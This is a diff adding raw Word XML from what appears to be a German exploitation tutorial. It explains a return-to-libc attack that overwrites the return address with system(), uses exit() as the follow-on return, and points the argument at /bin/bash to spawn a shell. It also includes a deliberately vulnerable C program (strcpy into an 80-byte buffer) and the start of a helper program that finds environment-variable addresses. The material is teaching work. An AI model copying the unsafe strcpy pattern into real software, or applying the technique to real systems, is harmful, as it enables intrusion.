+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:sectPr>
+          <w:pgSz w:w="11906" w:h="16838"/>
+          <w:pgMar w:top="1417" w:right="1417" w:bottom="1134" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="708"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="26" w:name="_Toc339281428"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Wie nutzen wir das aus</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> und warum funktioniert es</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="26"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:sectPr>
+          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
+          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1134" w:header="708" w:footer="708" w:gutter="0"/>
+          <w:cols w:space="708"/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+      <w:r>
+        <w:object w:dxaOrig="12321" w:dyaOrig="6552">
+          <v:shape id="_x0000_i1033" type="#_x0000_t75" style="width:616.35pt;height:327.55pt" o:ole="">
+            <v:imagedata r:id="rId33" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1033" DrawAspect="Content" ObjectID="_1413023295" r:id="rId34"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ptr1 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ist die Return Adresse nach dem die Main() Funktion beendet wurde</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ptr1 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">= </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>system</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Nächster Wert im </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Stack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> heißt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ptr2 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>und ist die angenommene Return Adresse nach dem System() beendet wurde</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Dadurch wird nach dem System() beendet wurde </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>exit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() aufgerufen</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ptr3 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ist das übernommene Argument für System()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ptr3 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>zeigt auf „/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Dadurch aktiviert </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>system</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">() eine </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Bashshell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beschriftung"/>
+      </w:pPr>
+      <w:r>
+        <w:object w:dxaOrig="9845" w:dyaOrig="7237">
+          <v:shape id="_x0000_i1034" type="#_x0000_t75" style="width:453.35pt;height:333.1pt" o:ole="">
+            <v:imagedata r:id="rId35" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1034" DrawAspect="Content" ObjectID="_1413023296" r:id="rId36"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4F81BD" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="27" w:name="_Toc339281429"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Stackaufbau</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="27"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:object w:dxaOrig="7660" w:dyaOrig="6482">
+          <v:shape id="_x0000_i1035" type="#_x0000_t75" style="width:333.1pt;height:281.65pt" o:ole="">
+            <v:imagedata r:id="rId37" o:title=""/>
+          </v:shape>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1035" DrawAspect="Content" ObjectID="_1413023297" r:id="rId38"/>
+        </w:object>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="28" w:name="_Toc339281430"/>
+      <w:r>
+        <w:t>ExploitMe2.c</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="28"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>167528</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4229100" cy="1804147"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="24765"/>
+                <wp:wrapNone/>
+                <wp:docPr id="21" name="Textfeld 21"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4229100" cy="1804147"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdio.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>string.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argc</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> **</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>{</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[80];</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>getchar</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>();</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>strcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[1]);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>return</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 1;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 21" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:13.2pt;width:333pt;height:142.05pt;z-index:251673600;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdio.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>string.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argc</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> **</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>{</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[80];</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>getchar</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>();</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>strcpy</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>buffer</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[1]);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>return</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 1;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="7849"/>
+        </w:tabs>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="29" w:name="_Toc339281431"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GetEnvironmentVarAddr.c</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="29"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>118619</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4232080" cy="1802891"/>
+                <wp:effectExtent l="0" t="0" r="16510" b="26035"/>
+                <wp:wrapNone/>
+                <wp:docPr id="22" name="Textfeld 22"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4232080" cy="1802891"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdio.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdlib.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>int</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argc</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> **</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>{</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> *</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
